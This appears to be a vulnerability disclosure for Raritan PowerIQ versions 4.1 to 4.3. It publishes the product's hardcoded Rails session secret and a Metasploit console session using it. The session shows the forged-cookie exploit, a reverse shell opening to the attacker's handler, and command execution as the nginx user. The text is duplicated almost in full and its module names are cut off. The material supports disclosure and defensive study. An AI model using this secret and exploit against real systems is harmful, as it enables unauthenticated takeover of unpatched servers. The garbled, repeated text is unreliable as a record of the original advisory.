Raritan PowerIQ versions 4.1, 4.2, and 4.3 ship with a Rails 2 web
interface with a hardcoded session secret
of 8e238c9702412d475a4c44b7726a05
This can be used to achieve unauthenticated remote code execution as the
nginx user on vulnerable systems.
msf exploit(rails_secret_
Module options (exploit/multi/http/rails_
Name Current Setting
Required Description
---- ---------------
-------- -----------
COOKIE_NAME
no The name of the
session cookie
DIGEST_NAME SHA1
yes The digest type
used to HMAC the session cookie
HTTP_METHOD GET
yes The HTTP request
method (GET, POST, PUT typically work)
Proxies
no A proxy chain of
format type:host:port[,type:host:
RAILSVERSION 3
yes The target Rails
Version (use 3 for Rails3 and 2, 4 for Rails4)
RHOST 192.168.0.20
yes The target address
RPORT 443
yes The target port
SALTENC
BAh7CUkiCXNrZXkGOgZFRkkiFTgzMz
yes The encrypted cookie salt
SALTSIG 42df31d8a91b45e5ad3e9f3213dc5d
yes The signed
encrypted cookie salt
SECRET 8e238c9702412d475a4c44b7726a05
yes The secret_token
(Rails3) or secret_key_base (Rails4) of the application (needed to sign the
cookie)
TARGETURI /login/login
yes The path to a
vulnerable Ruby on Rails application
VALIDATE_COOKIE true
no Only send the
payload if the session cookie is validated
VHOST
no HTTP server
virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(rails_secret_
[*] Started reverse handler on 192.168.0.19:4444
[*] Checking for cookie
[*] Adjusting cookie name to _session_id
[+] SECRET matches! Sending exploit payload
[*] Sending cookie _session_id
[*] Command shell session 1 opened (192.168.0.19:4444 -> 192.168.0.20:43729)
at 2015-03-11 19:45:20 -0500
id
uid=498(nginx) gid=498(nginx) groups=498(nginx),100(users)
Authored by Brandon Perry
interface with a hardcoded session secret
of 8e238c9702412d475a4c44b7726a05
This can be used to achieve unauthenticated remote code execution as the
nginx user on vulnerable systems.
msf exploit(rails_secret_
Module options (exploit/multi/http/rails_
Name Current Setting
Required Description
---- ---------------
-------- -----------
COOKIE_NAME
no The name of the
session cookie
DIGEST_NAME SHA1
yes The digest type
used to HMAC the session cookie
HTTP_METHOD GET
yes The HTTP request
method (GET, POST, PUT typically work)
Proxies
no A proxy chain of
format type:host:port[,type:host:
RAILSVERSION 3
yes The target Rails
Version (use 3 for Rails3 and 2, 4 for Rails4)
RHOST 192.168.0.20
yes The target address
RPORT 443
yes The target port
SALTENC
BAh7CUkiCXNrZXkGOgZFRkkiFTgzMz
yes The encrypted cookie salt
SALTSIG 42df31d8a91b45e5ad3e9f3213dc5d
yes The signed
encrypted cookie salt
SECRET 8e238c9702412d475a4c44b7726a05
yes The secret_token
(Rails3) or secret_key_base (Rails4) of the application (needed to sign the
cookie)
TARGETURI /login/login
yes The path to a
vulnerable Ruby on Rails application
VALIDATE_COOKIE true
no Only send the
payload if the session cookie is validated
VHOST
no HTTP server
virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(rails_secret_
[*] Started reverse handler on 192.168.0.19:4444
[*] Checking for cookie
[*] Adjusting cookie name to _session_id
[+] SECRET matches! Sending exploit payload
[*] Sending cookie _session_id
[*] Command shell session 1 opened (192.168.0.19:4444 -> 192.168.0.20:43729)
at 2015-03-11 19:45:20 -0500
id
uid=498(nginx) gid=498(nginx) groups=498(nginx),100(users)
Authored by Brandon Perry